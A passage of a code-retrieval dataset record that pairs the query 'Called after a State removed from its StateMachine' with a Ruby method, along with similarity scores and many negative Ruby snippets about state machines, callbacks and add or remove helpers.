"def unclean_shutdown_state\n super\n end",
"def after_rendering( state=nil )\n\t\t# Nothing to do\n\t\treturn nil\n\tend",
"def add_state(state)\n inferred_state = infer_state(state)\n self.states.upush! inferred_state if inferred_state\n end",
"def update_state\n raise \"Nothing to do\"\n end",
"def pre_enter(state_manager, game)\n # puts \"State : #{self.class}\"\n @exiting = false\n end",
"def across_virtual_state\n super\n end",
"def after_remembered\n end",
"def after_initialize\n end",
"def after_initialize\n end",
"def add_state(s)\n @states << s\n self\n end",
"def after_transition(*args, &block); end",
"def after\n each {|transition| transition.machine.write(object, :event_transition, transition)} if skip_after && success?\n super\n end",
"def after_initialize\n @loaded = Set.new\n end",
"def after_setup\n # do nothing by default\n end",
"def on_initialization_finished()\n end",
"def post_init(&block)\n @hooks[:post_init] = block\n end",
"def post_setup\n end",
"def endState(tag)\n raise \"Not implemented\"\n end",
"def across_service_state\n super\n end",
"def post_init \n self.class.add_signal_traps\n setup_dataflow\n end",
"def after_remembered; end",
"def after_recorded\n end",
"def update\n super\n @ucActStates.update()\n end",
"def state\n end",
"def on_after_load\n end",
"def after_state=(value)\n sync_configuration\n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def setup(state) ; end",
"def after_deactivate\n end",
"def finalized; end",
"def after_processing_hook; end",
"def states; end",
"def after_initialize \n end",
"def after_from_gtfs(model_attr_hash)\n end",
"def after_set_callback; end",
"def define_state_initializer\n @instance_helper_module.class_eval <<-end_eval, __FILE__, __LINE__\n # Ensure that the attributes setter gets used to force initialization\n # of the state machines\n def initialize(attributes = nil, *args)\n attributes ||= {}\n super\n end\n \n # Hooks in to attribute initialization to set the states *prior*\n # to the attributes being set\n def attributes=(new_attributes, *args)\n if new_record? && !@initialized_state_machines\n @initialized_state_machines = true\n \n ignore = if new_attributes\n attributes = new_attributes.dup\n attributes.stringify_keys!\n sanitize_for_mass_assignment(attributes).keys\n else\n []\n end\n \n initialize_state_machines(:dynamic => false, :ignore => ignore)\n super\n initialize_state_machines(:dynamic => true, :ignore => ignore)\n else\n super\n end\n end\n end_eval\n end",
"def add_state(v)\nunless has_state?(v)\n@state[v] = true\n@transition[v] = {}\nend\nend",
"def after_initialize\n end",
"def store_merge_state; end",
"def store_merge_state; end",
"def aasm_ensure_initial_state\n self.aasm_state = :new\n end",
"def after(state)\n @its << [@describe_name, @it_name, Time.now.to_f - @it_time]\n super\n end",
"def log_state\n super\n end",
"def after_initialize\n # noop\n end",
"def after_create\n\t\tsuper\n\t\t# associate an enrollment queue\n\t\teq = EnrollmentQueue.create(user_id: self.id)\n\t\tself.enrollment_queue = eq\n\t\teq.user = self\n\t\t# associate a state table\n\t\tst = StateTable.create(user_id: self.id)\n\t\tself.state_table = st\n\t\tst.user = self\n\n\n if not ['app', 'android', 'ios'].include? self.platform\n\t\t self.state_table.update(subscribed?: false) unless ENV['RACK_ENV'] == 'test'\n # self.state_table.update(subscribed?: true)\n end\n\n\t\tif not ['fb', 'app', 'android', 'ios'].include? self.platform\n\t\t\tself.code = generate_code\n\t\tend\n\t\t# puts \"start code = #{self.code}\"\n\t\twhile !self.valid?\n\t\t\tself.code = (self.code.to_i + 1).to_s\n\t\t\t# puts \"new code = #{self.code}\"\n\t\tend\n\t\t# set default curriculum version\n\t\tENV[\"CURRICULUM_VERSION\"] ||= '0'\n\t\tself.update(curriculum_version: ENV[\"CURRICULUM_VERSION\"].to_i)\n\n\t\t# we would want to do\n\t\t# self.save_changes\n\t\t# self.state_table.save_changes\n\t\t# but this is already done for us with self.update and self.state_table.update\n\n\trescue => e\n\t\tp e.message + \" could not create and associate a state_table, enrollment_queue, or curriculum_version for this user\"\n\tend",
"def after\n end",
"def save_state(state)\n states.add(state)\n end"
] |
[
"0.7086918",
"0.68461746",
"0.684084",
"0.67249316",
"0.6607615",
"0.6184547",
"0.6177497",
"0.6144093",
"0.60873175",
"0.60567564",
"0.5937094",
"0.5930762",
"0.59305817",
"0.5927014",
"0.59043527",
"0.59043527",
"0.59043527",
"0.59043527",
"0.59043527",
"0.59043527",
"0.59043527",
"0.59043527",
"0.58673424",
"0.5850843",
"0.58504784",
"0.583485",
"0.58290136",
"0.5819438",
"0.58165485",
"0.5815556",
"0.5803605",
"0.57970536",
"0.57947326",
"0.5783348",
"0.5783348",
"0.5783348",
"0.5783348",
"0.57782656",
"0.57782656",
"0.5768442",
"0.5740903",
"0.57244027",
"0.57238144",
"0.5671094",
"0.5669144",
"0.5663747",
"0.5653026",
"0.5623205",
"0.5614976",
"0.5613235",
"0.56122774",
"0.56070596",
"0.5603687",
"0.5600926",
"0.5599944",
"0.5578401",
"0.557285",
"0.5572226",
"0.5563382",
"0.5563382",
"0.55511",
"0.55112195",
"0.5505307",
"0.550309",
"0.5502777",
"0.5494927",
"0.5482751",
"0.54787827",
"0.5465573",
"0.54631007",
"0.54522467",
"0.54485536",
"0.5447107",
"0.54471046",
"0.543084",
"0.54298097",
"0.542921",
"0.54249924",
"0.54249924",
"0.54249924",
"0.54217887",
"0.5418536",
"0.5411244",
"0.5408262",
"0.5401857",
"0.53966206",
"0.53963584",
"0.53924406",
"0.539203",
"0.5389817",
"0.5385887",
"0.5382842",
"0.5382842",
"0.5379341",
"0.5375515",
"0.5373924",
"0.5370209",
"0.53658676",
"0.53581953",
"0.5353961"
] |
0.68584603
|
1
|
Called after a State removed from its StateMachine.
|
def state_removed! statemachine
transitions_changed!
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def delete_state(state)\n states.remove(state)\n end",
"def erase_state(state_id)\n super\n check_state_remove_effects(state_id)\n end",
"def pop_state\n @state.pop\n end",
"def destroy\n @state.destroy\n end",
"def destroy\n @state.destroy\n end",
"def destroyed(event)\n self.state = nil if event.target.data[:id] == state\n refresh\n end",
"def remove_state(state)\n self.from(state).each { |transition| remove(transition) }\n self.to(state).each { |transition| remove(transition) }\n self.states.delete(state)\n end",
"def on_state_erase(state_id)\n reset_effect_param_cache\n end",
"def clearState()\n\t\t\t@_previous_state = @_state\n\t\t\t@_state = nil\n\t\tend",
"def onstatechange_unregister(b)\n @onstatechange_list.delete b\n end",
"def onstatechange_unregister(b)\n @onstatechange_list.delete b\n end",
"def after_state(state)\n end",
"def exit!\n map = @transition_map\n map.each do |type, events_to_transition_arrays|\n events_to_transition_arrays.each do |event, transitions|\n transitions.each(&:unarm)\n end\n end\n\n @exit_actions.each do |exit_action|\n exit_action.call(@state_machine)\n end\n @state_machine.current_state = nil\n end",
"def run_on_deletion(paths)\n @state_machine.remove(paths)\n end",
"def delete_state(state)\n @states.reject! { |_,v| v == state }\n#$stderr.print \"States: #{@states.length} \"\n end",
"def clear_state\n @state.clear\n self\n end",
"def discard_saved_state\n end",
"def destroy\n \"#{@states_assign.assigned_to}StateMachine\".constantize.states.delete(@states_assign.state.name)\n @states_assign.destroy\n\n puts '##############################'\n puts LeadStateMachine.states\n puts '##############################'\n\n respond_to do |format|\n format.html { redirect_to states_assigns_url, notice: 'State was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def pop_state\t\n\t\t\t@state_buffer = Proc.new do\n\t\t\t\t@objs2 = []\n\t\t\t\t@current_state = @states.pop\n\t\t\tend\n\t\tend",
"def drop( number )\n\n load_parent_state\n \n return super\n\n end",
"def reset_state\n @state = nil\n end",
"def remove_from_state state, ios\n return if ios.empty?\n\n state.send do |state|\n SelectorState.new(state.active - ios,\n state.inactive - ios,\n hash_without_keys(state.receivers, ios))\n end\n rescue => e\n log(Logger::ERROR, self.to_s + '#remove_from_state', e.to_s)\n end",
"def destroy(state_manager, game)\n end",
"def discard_saved_state\n execute(\"discardstate\", @uuid)\n end",
"def clear\n current_state.clear\n end",
"def popState()\n\t\t\tif @_state_stack.empty? then\n\t\t\t\tif @_debug_flag then\n\t\t\t\t\t@_debug_stream.puts \"POPPING ON EMPTY STATE STACK.\\n\"\n\t\t\t\tend\n\t\t\t\traise \"empty state stack.\\n\"\n\t\t\telse\n\t\t\t\t@_state = @_state_stack.pop\n\t\t\t\tif @_debug_flag then\n\t\t\t\t\t@_debug_stream.puts \"POP TO STATE : %s\\n\" % @_state.getName\n\t\t\t\tend\n\t\t\tend\n\t\tend",
"def endState(tag)\n raise \"Not implemented\"\n end",
"def cleanup\n @transition_map.each do |type, events_to_transition_arrays|\n events_to_transition_arrays.each do |event, transitions|\n transitions.clear\n end\n end\n\n @transition_map = nil\n @state_machine = nil\n @entry_actions = nil\n @exit_actions = nil\n end",
"def stop_and_cleanup\n raise_outside_initial_queue\n @state_machine.log \"Stopping #{self}...\" if @verbose\n @current_state.send :exit!\n @current_state = nil\n @state_symbols_to_states.values.each(&:cleanup)\n end",
"def pop_scene\n\t\t\tset_state(:stopped)\n\t\tend",
"def unclean_shutdown_state\n super\n end",
"def unresolve\n change_state(:unresolve)\n end",
"def unhook\n Nest.get(base_module).remove(self)\n Agency.instance.retire(self)\n\n and_return(@original_value) if previously_defined?\n\n @original_value = @previously_defined = nil\n self\n end",
"def leave; end",
"def cleanup_state\n delete_if_exists(state_file_path)\n delete_if_exists(chef_file_path)\n delete_if_exists(past_scripts_path)\n delete_if_exists(log_path)\n end",
"def destroy\n @state.destroy\n respond_to do |format|\n format.html { redirect_to states_url, notice: 'State was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @state.destroy\n respond_to do |format|\n format.html { redirect_to states_url, notice: 'State was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def after_destroyed\n end",
"def destroy\n @state.destroy\n respond_to do |format|\n format.html { redirect_to states_url }\n format.json { head :no_content }\n end\n end",
"def destroy(_state)\n workflow do\n run_destroy.bind do\n remove_instance_directory\n end\n end\n end",
"def clean\n reset_states rescue nil\n set_executed_commands rescue nil\n end",
"def shut_down\n end",
"def leave()\n @active.pop\n end",
"def destroy(state)\n hostname = state[:hostname]\n poolsclosed_delete(hostname)\n state.delete(:hostname)\n end",
"def destroy\n @state = State.find(params[:id])\n @state.destroy\n\n respond_to do |format|\n format.html { redirect_to(admin_states_url) }\n format.xml { head :ok }\n end\n end",
"def final_state(state)\n final_states(state)\n end",
"def on_remove\n @context.notifications.off(\"graph.start\", self)\n @context.notifications.off(\"graph.stop\", self)\n\n io.outputs.each { |k, o| @context.connections.delete(o.guid) }\n io.unregister_inputs\n var.unregister\n stop\n end",
"def after_deactivate\n end",
"def destroy\n @state = State.find(params[:id])\n @state.destroy\n\n respond_to do |format|\n format.html { redirect_to states_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @state = State.find(params[:id])\n @state.destroy\n\n respond_to do |format|\n format.html { redirect_to states_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @event_state.destroy\n respond_to do |format|\n format.html { redirect_to event_states_url, notice: 'Event state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def mouse_out(e)\n @state = nil\n end",
"def destroy\n @state = State.find(params[:id])\n @state.destroy\n\n respond_to do |format|\n format.html { redirect_to(states_url) }\n format.xml { head :ok }\n end\n end",
"def remove_agent_trap_state(opts)\n opts = check_params(opts,[:state])\n super(opts)\n end",
"def setup_rem_state\n return unless PONY::ERRNO::check_sequence(current_act)\n current_action_targets.each do |target|\n state_id = @acts[1]\n chance = @acts[2] || 100\n chance = chance / 100.0 if c.integer?\n target.remove_state(state_id) if rand < chance\n end\n end",
"def unload\n Unit.unload(self.label)\n end",
"def destroy\n @cultural_heritage_collection_state = CulturalHeritage::CollectionState.find(params[:id])\n @cultural_heritage_collection_state.deleted = 1\n @cultural_heritage_collection_state.save\n\n respond_to do |format|\n format.html { redirect_to(cultural_heritage_collection_states_url) }\n format.xml { head :ok }\n end\n end",
"def delete_state(node)\n # => Find the Node\n existing = find_state(node)\n return 'Node not present in state' unless existing\n # => Delete the Node from State\n state.delete(existing)\n # => Write Out the Updated State\n write_state\n # => Return the Deleted Node\n existing\n end",
"def destroy\n @map_state = MapState.find(params[:id])\n @map_state.destroy\n\n respond_to do |format|\n format.html { redirect_to map_states_url }\n format.json { head :ok }\n end\n end",
"def after_clear\n end",
"def close\r\n pop_game_state\r\n end",
"def remove_statefile(path)\n key = path.sub(\"#{statefiles_root}/#{@bucket}/\",'')\n delete_empty_statefile(key)\n end",
"def destroy\n @modelstate.destroy\n respond_to do |format|\n format.html { redirect_to modelstates_url }\n format.json { head :no_content }\n end\n end",
"def after_destroy_hook\n execute_hooks_for(:after, :destroy)\n end",
"def destroy\n\t\t@state = State.find(params[:id])\n if @state.destroy\n \tflash[:success] = \"Record destroyed\"\n \tredirect_to states_path\n else\n \tflash[:error] = \"Record not destroyed\"\n end\n\tend",
"def error_reset\n @@state.delete(@server)\n end",
"def destroy\n @process_state.destroy\n respond_to do |format|\n format.html { redirect_to process_states_url }\n format.json { head :no_content }\n end\n end",
"def restore_graphics_state\n @stack.pop\n end",
"def destroy\n @user_state.destroy\n respond_to do |format|\n format.html { redirect_to user_states_url, notice: 'User state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def after_destroy(machine)\n expire_cache_for(machine)\n MachineChange.create! machine: machine, change_type: MachineChange::ChangeType::DELETE\n end",
"def unload!\n self.choices = @old_choices\n end",
"def destroy\n @surgery_state.destroy\n respond_to do |format|\n format.html { redirect_to surgery_states_url, notice: 'Surgery state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @user_state.destroy\n respond_to do |format|\n format.html { redirect_to user_states_url }\n format.json { head :no_content }\n end\n end",
"def cleanup_hook; end",
"def destroy(state)\n info(\"Destroying instance #{instance.name}\")\n return if state[:server_id].nil?\n instance.transport.connection(state).close\n domain = load_domain(state[:server_id])\n destroy_domain(domain) unless domain.nil?\n info(\"Libvirt instance #{state[:server_id]} destroyed.\")\n state.delete(:server_id)\n state.delete(:hostname)\n end",
"def destroy\n @united_state.destroy\n respond_to do |format|\n format.html { redirect_to united_states_url, notice: 'United state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def unload!\n unload_resources!\n reset_menu!\n end",
"def shutdown\n @registry.clear\n end",
"def un_load\n\n NSLog('Whatever hasn\\'t been unloaded and could be better be now!')\n NSLog('We probably don\\'t need this now that we\\'re using RubyMotion and it\\'s awesome!')\n\n end",
"def destroy\n @private_message_state.destroy\n respond_to do |format|\n format.html { redirect_to private_message_states_url, notice: 'Private message state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @current_state.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'CurrentState was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def finalize\r\n push_game_state(Main) # switch to game state \"Menu\"\r\nend",
"def did_destroy\n @destroyed = true\n self.class.identity_map.delete self.id\n self.class.all.delete self\n\n trigger_events(:destroy)\n end",
"def removed(attribute_name)\n changed(attribute_name)\n end",
"def removed(attribute_name)\n changed(attribute_name)\n end",
"def fish_removed()\n @fish_count.pop()\n end",
"def cleanup(machine, opts)\n end",
"def remove_timer_state(entry)\n timer = entry[1]\n @timers.delete entry\n @timers_time.delete timer\n\n state = remove_state(timer, State::STATE_TIMER)\n deregister_state timer if state == 0\n nil\n end",
"def reset_state_at_page_finish\n add_content(\"\\nQ\" * @state_stack.size)\n end",
"def removed; status[:removed]; end",
"def destroyed(item)\n bowline.destroyed(\n name, \n item.id\n ).call\n end",
"def leave()\n raise NotImplementedError\n end",
"def remove; end",
"def remove; end",
"def remove; end",
"def remove; end",
"def destroy\n @task_state.destroy\n respond_to do |format|\n format.html { redirect_to task_states_url, success: 'Task state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def tear_down; end",
"def event_removed(event, last, last_for_event)\n @persistor.event_removed(event, last, last_for_event) if @persistor\n end",
"def _after_update\n # SEQUEL5: Remove\n @this = nil\n end"
] |
[
"0.7106296",
"0.70077455",
"0.6975829",
"0.6958535",
"0.6958535",
"0.6926397",
"0.69051963",
"0.663011",
"0.6600804",
"0.6598869",
"0.6598869",
"0.6502423",
"0.64411944",
"0.63950866",
"0.63798195",
"0.63691187",
"0.63545805",
"0.62847775",
"0.62550706",
"0.6246275",
"0.6219055",
"0.61982226",
"0.61451423",
"0.6102924",
"0.60805595",
"0.6068126",
"0.60611093",
"0.59717906",
"0.5968932",
"0.592727",
"0.5925986",
"0.5910905",
"0.5870403",
"0.5858344",
"0.5839345",
"0.58224934",
"0.58224934",
"0.57958627",
"0.5787724",
"0.5778472",
"0.5767764",
"0.5756087",
"0.5747704",
"0.57302094",
"0.5718187",
"0.57085574",
"0.56953496",
"0.56769603",
"0.5665861",
"0.5665861",
"0.5663275",
"0.56506",
"0.56335527",
"0.5630487",
"0.562288",
"0.56170446",
"0.5616439",
"0.55947655",
"0.5587196",
"0.55778885",
"0.5560089",
"0.55588675",
"0.5520719",
"0.55166537",
"0.5515691",
"0.55132693",
"0.5488834",
"0.5481407",
"0.54790235",
"0.54776233",
"0.54766136",
"0.5470559",
"0.54639566",
"0.5461429",
"0.5460537",
"0.5458093",
"0.5455836",
"0.5455311",
"0.54522896",
"0.54492754",
"0.5429112",
"0.5426672",
"0.5421432",
"0.54123837",
"0.54123837",
"0.5392527",
"0.53862214",
"0.538111",
"0.53755975",
"0.537527",
"0.53737104",
"0.5368449",
"0.53672296",
"0.53672296",
"0.53672296",
"0.53672296",
"0.53597385",
"0.5359088",
"0.5357405",
"0.5353635"
] |
0.83318
|
0
|
Adds a Pseudostate to this State.
|
def add_connectionPoint! s
_log { "add_connectionPoint! #{s.inspect}" }
if @connectionPoint.find { | x | x.name == s.name }
raise ArgumentError, "connectionPoint named #{s.name.inspect} already exists"
end
@ownedMember << s # ownedElement?!?!
@connectionPoint << s
s.state = self
# Notify.
s.connectionPoint_added! self
s
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def add_state(state)\n inferred_state = infer_state(state)\n self.states.upush! inferred_state if inferred_state\n end",
"def addstate ( ps )\n raise TypeError, ps.class.to_s + ': Incorrectly types for \\'<<\\' method of <Parser>.' unless\n\tps.instance_of? State\n\n @states << ps\n end",
"def add_state(s)\n @states << s\n self\n end",
"def << (triple)\n # self.add_triple(s, p, o)\n @triples += [ triple ]\n end",
"def add_state_attr(attr)\n new_attrs = (self.class.state_attrs << attr).uniq\n self.class.state_attrs(*new_attrs)\n end",
"def add_state(new_state)\n valid = true\n @states.each do |state|\n raise Fae::DuplicateStateException, 'Duplicate state added for Finite Automata' if new_state.name == state.name\n end\n @states << new_state\n end",
"def add_state(state, value = false)\n @states[state] = [\n factory.composite_state(self.class.name, state),\n value\n ]\n\n classify_state @states[state]\n end",
"def add(p)\nq = self.dup\nq.add!(p)\nend",
"def +(p)\n Pair.new(@x + p.x, @y + p.y)\n end",
"def add_neuron(n)\n neurons << n\n end",
"def add(name, state)\n\tif(@states[name] != nil)\n\t raise StateMachine::Error, \"state '#{name}' exists\"\n\tend\n\t@states[name] = state\n\treturn self\n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def dup_adding_state(line)\n self.class.new(queue, codec, path).add_state(line)\n end",
"def set_PADD(value)\n set_input(\"PADD\", value)\n end",
"def add(p0) end",
"def +(value)\n duplicate = self.dup \n duplicate << value\n duplicate\n end",
"def +(p)\n group(self, p)\n .fmap {|(x, y)| x + y }\n .tap {|r| r.label = \"(#{label} + #{p.label})\" }\n end",
"def <<( n )\n n.add_label!( self )\n end",
"def +(delta)\n clone.increment(Meangirls.node, delta)\n end",
"def save_state(state)\n states.add(state)\n end",
"def add(time)\n newDuration = self.dup() ;\n return self.inc(time) ;\n end",
"def yadd( off )\n @y.add( off )\n self\n end",
"def add(pointer, pmodes)\n args = get_parameters(pointer, pmodes)\n @ram[args[2]] = args[0] + args[1]\n pointer + 4\n end",
"def dup_state\r\n @state.dup\r\n end",
"def add point\n self.x += point.x\n self.y += point.y\n self\n end",
"def new_state\nnewID = @@nextID\n@@nextID += 1\n@state[newID] = true\n@transition[newID] = {}\nnewID\nend",
"def add_to_point point\n add_to_point! point.dup\n end",
"def add(o)\n @hash[o] = true\n self\n end",
"def +(other)\n self.clone.set(@addr + other, @family)\n end",
"def + (point)\n self.class.new(x + point.x, y + point.y)\n end",
"def add (input)\n @g_inputs << input\n end",
"def +(other)\n transitions = @transitions.merge(other.transitions)\n # Add a new empty transition from the final states in the current\n # automaton to the inital state in the adjoined automaton.\n @final_states.each do |s|\n if transitions[s]\n transitions[s].merge!({nil => other.initial_state })\n else\n transitions[s] = {nil => other.initial_state }\n end\n end\n\n # Should check automaton type here instead of defaulting to NDFSA\n NDFSA.new(transitions, @initial_state, other.final_states, @cats)\n end",
"def <<(p)\n raise TypeError, \"Esperada pregunta para inserción\" unless p.is_a? (Pregunta)\n if (@total == 0)\n @cabeza = Nodo.new(p, nil, nil)\n @cola = @cabeza\n else\n @cola.next = Nodo.new(p, nil, @cola)\n @cola = @cola.next\n @cola.value\n end\n @total += 1\n end",
"def +(*others)\n self.dup.add!(*others)\n end",
"def add!(p)\n@x += p.x\n@y += p.y\nself\nend",
"def add_synonym(synonym)\n synonyms << synonym\n end",
"def add_states(new_states); end",
"def add_agg_pubkey(activate_height, agg_pubkey)\n payload = activate_height.to_even_length_hex + agg_pubkey\n index = latest_agg_pubkey_index\n next_index = (index.nil? ? 0 : index + 1).to_even_length_hex\n db.batch do\n db.put(KEY_PREFIX[:agg_pubkey] + next_index, payload)\n db.put(KEY_PREFIX[:latest_agg_pubkey], next_index)\n end\n end",
"def add num = 1\n @ec.add reg, size * num\n end",
"def test_add_state\n Automaton.new(false) do |fa|\n s0 = fa.add_state\n assert_equal(1, fa.state_count)\n assert_equal(false, s0.initial?)\n assert_equal(false, s0.accepting?)\n\n s1 = fa.add_state(:initial => true)\n assert_equal(2, fa.state_count)\n assert_equal(true, s1.initial?)\n assert_equal(false, s1.accepting?)\n\n s2 = fa.add_state(:initial => true, :accepting => true)\n assert_equal(3, fa.state_count)\n assert_equal(true, s2.initial?)\n assert_equal(true, s2.accepting?)\n\n s3 = fa.add_state(:myownkey => \"blambeau\")\n assert_equal(4, fa.state_count)\n assert_equal(false, s3.initial?)\n assert_equal(false, s3.accepting?)\n assert_equal(\"blambeau\", s3[:myownkey])\n\n assert_equal(0, fa.edge_count)\n end\n end",
"def +(ts)\n self.clone.add_points ts\n end",
"def add\n match '+'\n term\n emit_ln 'ADD (SP)+, D1'\nend",
"def add(other)\r\n Bottle.new(@label, @ounces+other.ounces)\r\n end",
"def add(other)\r\n Bottle.new(@label, @ounces+other.ounces)\r\n end",
"def add_state(state)\n if not @states.include? state\n # Prevents arbitrarily overriding methods that you shouldn't be\n raise \"Method already taken #{state}?\" if @class.methods.include?(:\"#{state}?\")\n @states[state] = State.new(state)\n @class.send(:define_method, :\"#{state}?\"){current_state == state}\n end\n end",
"def add(other)\n clone.add! other\n end",
"def add(d, s, t)\n reg_w(d, reg_r(s) + reg_r(t))\n adv_pc\n end",
"def add_property(x)\n x = Property.create(x)\n safe_add_edge(x, x.opposite, :provable_false)\n safe_add_edge(x.opposite, x, :provable_false)\n safe_add_edge(x, x, :provable_true)\n safe_add_edge(x.opposite, x.opposite, :provable_true)\n x\n end",
"def add(opt)\n ipaddr_modify(RTM_NEWADDR, NLM_F_CREATE|NLM_F_EXCL, opt)\n end",
"def + point\n\t\tPoint.new(@x+point.x, @y+point.y)\n\tend",
"def add!(point)\r\n @x += point.x\r\n @y += point.y\r\n end",
"def add_feature(feature, state)\n check_feature_is_not_symbol(feature)\n check_feature_already_in_list(feature)\n Redis.current.hset(@redis_key, feature, state)\n end",
"def add_neuron(neuron)\r\n\t\t@neurons.push(neuron)\r\n\tend",
"def add(coordinate)\n new_x = @x + coordinate.x\n new_y = @y + coordinate.y\n new_coordinate = Coordinate.new(new_x,new_y)\n end",
"def add (geneBits)\n @genePool[@size] = Gene.new(@geneLen)\n @genePool[@size].duplicate(geneBits)\n @genePool[@size].fitness = geneBits.fitness\n @size += 1\n end",
"def add(value)\n \n end",
"def add word\n super word.clone\n end",
"def add(value)\n @add_at_next = 0 unless @add_at_next\n add_at @add_at_next, value\n end",
"def add_state(v)\nunless has_state?(v)\n@state[v] = true\n@transition[v] = {}\nend\nend",
"def +(val)\n Thread.current[:datet_addmode] = \"+\"\n self.add_something(val)\n end",
"def add_single toadd\n case toadd\n when Dist\n dist << @len.Dist\n dist.last_born << toadd\n else\n return false\n end\n true\n end",
"def add_shape(properties = {})\n shape = Shape.new(properties)\n shape.palette = @palette\n\n @shapes ||= []\n @shapes << shape # Store shape reference.\n shape\n end",
"def << (sup)\r\n new_network_id = self.get_network_id\r\n set_network_id = lambda do |s|\r\n raise(PlanB::InvalidClass, \"supported must be descendant of AlnTermination\") unless s.class.class_hierarchy.include?(AlnTermination)\r\n s.network_id = new_network_id\r\n s.layer_id = self.layer_id + 1\r\n s.termination_supporter = self\r\n s.save\r\n end\r\n sup.class.eql?(Array) ? sup.each{|s| set_network_id[s]} : set_network_id[sup]\r\n self.aln_resource << sup\r\n end",
"def add(el)\n # System.out.println(\"add(\"+el+\")\");\n n = word_number(el)\n # System.out.println(\"word number is \"+n);\n # System.out.println(\"bits.length \"+bits.length);\n if (n >= @bits.attr_length)\n grow_to_include(el)\n end\n @bits[n] |= bit_mask(el)\n end",
"def add_hex(hex)\n @hexes.push(hex)\n end",
"def +(seconds)\n TzTime.new(time + seconds, @zone)\n end",
"def add_gold(gold)\n @goldcounter += gold\n @goldcounter\n end",
"def +(other_point)\n Point.new(self.x + other_point.x, self.y + other_point.y)\n end",
"def add(point)\r\n new_point = Marshal.load(Marshal.dump(self))\r\n new_point.x = @x + point.x\r\n new_point.y = @y + point.y\r\n return new_point\r\n end",
"def +( other )\n dup << other\n end",
"def << (n)\n raise ArgumentError unless n.is_a?(Nota)\n self.old_append n \n end",
"def add_noise(data)\n noise(data, :+)\n end",
"def plus(signal)\n self.class.new(self, signal) { |a, b| a + b}\n end",
"def +(other)\n return dup.add(other)\n end",
"def add_node(n)\n @nodes.push n unless @nodes.include? n\n end",
"def add (p)\n @people << p \n end",
"def +(other)\n unioned = Automaton.new\n fa.dup(unioned)\n other.to_fa.dup(unioned)\n RegLang.new(unioned)\n end",
"def <<(input_token)\n @current_states = next_states(@current_states, input_token)\n end",
"def add_state(node, user, params)\n # => Create a Node-State Object\n (n = {}) && (n[:name] = node)\n n[:created] = DateTime.now\n n[:creator] = user\n n[:type] = params['type'] if params['type']\n # => Build the Updated State\n update_state(n)\n # => Return the Added Node\n find_state(node)\n end",
"def add!(rhs)\n @x += rhs.x\n @y += rhs.y\n self\n end",
"def Add(val)\n self.value += val\n end",
"def +(other)\n self.class.new(batch_state.to_h.merge(other.batch_state.to_h))\n end",
"def add_pin(_pin)\n raise \"pin named #{_pin.name} already added\" if @pins.include?(_pin.name)\n @pins[_pin.name] = _pin\n end",
"def add!(rhs)\n add rhs, self\n end",
"def add_fish (fish)\n @fish_population << fish\n\n end",
"def add_new_state_and_transition state_list, transitions, from_id, msg, destinations\n new_state_id = id_generator.next\n state_list << State.new(new_state_id, destinations )\n self.transitions << Transition.new(from_id, new_state_id, msg)\n end",
"def add_process!(redis, process_id)\n redis.multi do |conn|\n conn.zadd(key, Time.now.to_i, process_id)\n conn.expire(key, @timeout)\n end\n end",
"def +(p0) end",
"def +(p0) end",
"def +(p0) end",
"def +(p0) end",
"def +(other)\n `return self + other;`\n end",
"def +(other)\n `return self + other;`\n end",
"def add_address(address)\n @addresses << address\n end",
"def add(name, value = nil)\n symbols << [name.to_s, (Integer(value) if value)]\n end",
"def add(p, set_first = false)\n angle = self.angle(p)\n prior_idx = @neighbors.bsearch_index { |n| self.angle(n) >= angle }\n\n raise \"Point #{p.inspect} is already a neighbor of #{self.inspect}\" if prior_idx && @neighbors[prior_idx] == p\n\n @neighbors.insert(prior_idx || @neighbors.length, p)\n\n @first = p if @first.nil? || set_first\n end",
"def add_new\n self.times_used.unshift(0)\n self.save\n end",
"def add_round_key(state, round_key)\n state = Matrix.build(Nb, Nk) do |row, col|\n state[row, col] ^ round_key[row, col]\n end\n print_state(state, __method__) if DEBUG\n state\n end",
"def add(type)\n @value << type\n @value = @value.uniq\n end"
] |
[
"0.55765295",
"0.54607874",
"0.5139848",
"0.5138874",
"0.504211",
"0.50295275",
"0.49795917",
"0.49791703",
"0.49349418",
"0.4918888",
"0.48471597",
"0.47565934",
"0.47565934",
"0.47565934",
"0.47557563",
"0.47550985",
"0.47549525",
"0.47235757",
"0.47175694",
"0.47154087",
"0.47069126",
"0.46915808",
"0.46711937",
"0.46645337",
"0.46600065",
"0.46524134",
"0.4652322",
"0.4638726",
"0.45977417",
"0.4597115",
"0.45768738",
"0.4569087",
"0.45355994",
"0.45354936",
"0.45223352",
"0.4519889",
"0.45139337",
"0.45095053",
"0.44920325",
"0.44856012",
"0.44814417",
"0.4477048",
"0.44734687",
"0.44643426",
"0.44617188",
"0.44617188",
"0.44497025",
"0.44491652",
"0.44447985",
"0.4444712",
"0.44446218",
"0.44361895",
"0.44262728",
"0.4421441",
"0.44179112",
"0.4417401",
"0.4415284",
"0.43940037",
"0.43828607",
"0.4379975",
"0.43797952",
